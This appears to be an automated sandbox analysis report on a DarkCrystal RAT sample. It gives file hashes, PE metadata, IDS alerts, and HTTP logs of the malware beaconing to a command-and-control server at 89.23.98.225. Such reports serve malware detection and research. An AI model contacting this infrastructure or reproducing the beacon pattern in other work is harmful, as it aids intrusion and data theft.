                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):151
                                                                  Entropy (8bit):4.806609674329235
                                                                  Encrypted:false
                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXVWau4WmvpuVuWxRvj:Vx993DEUwXPk4c
                                                                  MD5:A29ACE2D99978DBFEF3D67A425745BC7
                                                                  SHA1:86E98F3C099A62118C7ABDDBFB623A0D58A285DD
                                                                  SHA-256:902FFEA081704AC6647F828CADBFBB737B3D64BA1E84C31C9A086BFBA854B686
                                                                  SHA-512:64E694C07062E0A8B42A4A92317809E8BC209BCD2B2CDBCDB3BEFA592B9E2C8E449893EEAF6FA8C21F78F3437D173F792D764289B38E1050B3F4532BA22B356D
                                                                  Malicious:false
                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 29/03/2024 09:09:33..09:09:33, error: 0x80072746.09:09:38, error: 0x80072746.
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.822210869380534
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:ZT3pxe2Tb4.exe
                                                                  File size:3'672'576 bytes
                                                                  MD5:4164d5955c244ff266c1cc41013fe21a
                                                                  SHA1:cd4b6caab8b3762d3af3b7ad738f51d2e92c2d34
                                                                  SHA256:138905d6721c1e6b174b6f61154a938565c9bd5c6b5b0abe8274054bf151da9c
                                                                  SHA512:fa321be81dcb76d26aca25e1aa82145204acdbd94026556f1031b6d29176096abf7de47c36dabd8a4c1c578b3bea04e31a639481fb3890c593e597720e14e444
                                                                  SSDEEP:98304:ce0NRfHctOXBignPFAfL7B71KHijptuNMsZ:c1lckBiKPJCVt4Z
                                                                  TLSH:1406E10696714E73C1A47F72C4E7082D92E09B667623EF1B371F50D9A8232718B571FA
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.......... 8.. ...@8...@.. ........................8...........@................................
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x7820fe
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3820b0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x384000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x386000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x380104 | 0x380200 | 0fbf4c3f1828842ffbf90db81458e910 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x384000 | 0x370 | 0x400 | decdc6cf86f7b728495e0907c027ea84 | False | 0.3759765625 | data | 2.8622309503628585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x386000 | 0xc | 0x200 | 951104bb5b7192bb5a0993d168e100ca | False | 0.041015625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "8" | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x384058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/29/24-07:38:03.072563 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49745 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:10.589011 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49731 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:41.258721 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49742 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:01.421586 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49730 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:37.301200 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49741 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:38:15.792609 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49746 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:55.065041 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49744 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:32.317096 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49740 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:38:55.054545 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49749 | 80 | 192.168.2.4 | 89.23.98.225
03/29/24-07:37:19.143924 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49738 | 80 | 192.168.2.4 | 89.23.98.225
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Mar 29, 2024 07:38:02.835516930 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.072112083 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.072240114 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.072562933 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.308924913 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.309076071 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.311923981 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.548557997 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.753887892 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:15.506139040 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:15.763705969 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:15.763787985 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:15.792608976 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:16.050101042 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:16.050306082 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:16.139678001 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:16.254513025 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:16.511805058 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:18.553652048 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.120861053 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.363040924 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.363173008 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.363462925 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.605492115 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.605541945 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.607585907 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.786469936 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.849894047 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.849967003 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.189112902 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.429017067 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.429090977 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.429280996 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.666357994 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.666553020 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.669164896 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.728008986 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.908014059 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.908094883 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:54.818653107 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.054209948 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.054311991 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.054544926 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.289860010 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.290139914 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.293150902 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.528521061 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.538605928 CET4974980192.168.2.489.23.98.225
                                                                  • 89.23.98.225
                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  0 | 192.168.2.4 | 49730 | 89.23.98.225 | 80 | 5496 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:01.421586037 CET | 381 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:01.659979105 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:01 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:01.671164989 CET | 344 | OUT | [binary request body]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  1 | 192.168.2.4 | 49731 | 89.23.98.225 | 80 | 7376 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:10.589010954 CET | 398 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:10.828888893 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:10.831746101 CET | 344 | OUT | [binary request body]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  2 | 192.168.2.4 | 49738 | 89.23.98.225 | 80 | 7736 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:19.143923998 CET | 380 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:19.387149096 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:19 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:19.392754078 CET | 344 | OUT | [binary request body]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  3 | 192.168.2.4 | 49739 | 89.23.98.225 | 80 | 7992 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:23.608653069 CET | 398 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 336
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:23.851135015 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:23.853965998 CET | 336 | OUT | [binary request body]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.4 | 49740 | 89.23.98.225 | 80 | 7300 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:32.317095995 CET | 381 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:32.560790062 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:32 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:32.563004017 CET | 344 | OUT | [binary request body]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.4 | 49741 | 89.23.98.225 | 80 | 3624 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:37.301199913 CET | 345 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:37.543878078 CET | 294 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                  Mar 29, 2024 07:37:37.554234982 CET344OUTData Raw: 05 05 04 07 06 0c 01 07 05 06 02 01 02 03 01 05 00 0b 05 01 02 0d 03 08 03 0f 0f 51 06 53 01 57 0c 0f 05 01 00 53 03 0b 0c 01 04 04 05 54 07 00 03 03 0e 0d 0c 02 04 0b 06 57 04 07 06 02 05 00 00 05 0a 0c 04 07 06 52 0d 00 0b 05 0d 07 0d 05 04 04
                                                                  Data Ascii: QSWSTWRPQVQ\L~Yv`bvXv[p||T]tlpLMRxUHlYzJ|}^tpiO~V@{SPbq


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  6 | 192.168.2.4 | 49742 | 89.23.98.225 | 80 | 5572 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:41.258721113 CET | 381 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:41.497651100 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:41 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:41.499818087 CET344OUTData Raw: 00 02 01 01 03 0b 04 05 05 06 02 01 02 03 01 0a 00 0b 05 08 02 01 03 00 00 00 0d 0c 04 54 06 03 0a 00 03 09 02 50 04 55 0e 53 02 05 07 57 07 54 04 53 0d 00 0f 03 04 05 04 57 03 06 06 56 06 00 05 0a 0f 59 05 54 04 56 0d 05 0b 04 0d 50 0d 51 07 03
                                                                  Data Ascii: TPUSWTSWVYTVPQ]S\L~ci^wbj^ue||ouBwBtO~`cZoRsJo`b|~kPt^tAie~V@zmPA~bW


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.4 | 49744 | 89.23.98.225 | 80 | 7272 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:37:55.065041065 CET | 381 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:55.308947086 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:55 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:55.312774897 CET344OUTData Raw: 05 00 04 06 03 08 01 05 05 06 02 01 02 04 01 00 00 05 05 0d 02 0c 03 09 03 01 0d 51 04 52 01 50 0a 07 06 0a 07 02 07 04 0b 03 04 07 04 06 07 55 06 53 0e 0d 0d 50 05 06 01 07 03 04 07 02 05 00 02 06 0a 0e 06 03 06 51 0c 03 0c 53 0e 06 0f 01 02 02
                                                                  Data Ascii: QRPUSPQSV\L}Rhce\crSa[wP|oiOwB|s]_xll_{N~D|hA`|OiO~V@@xCnru


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.4 | 49745 | 89.23.98.225 | 80 | 7244 | C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:38:03.072562933 CET | 381 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 336
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:03.309076071 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:03 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
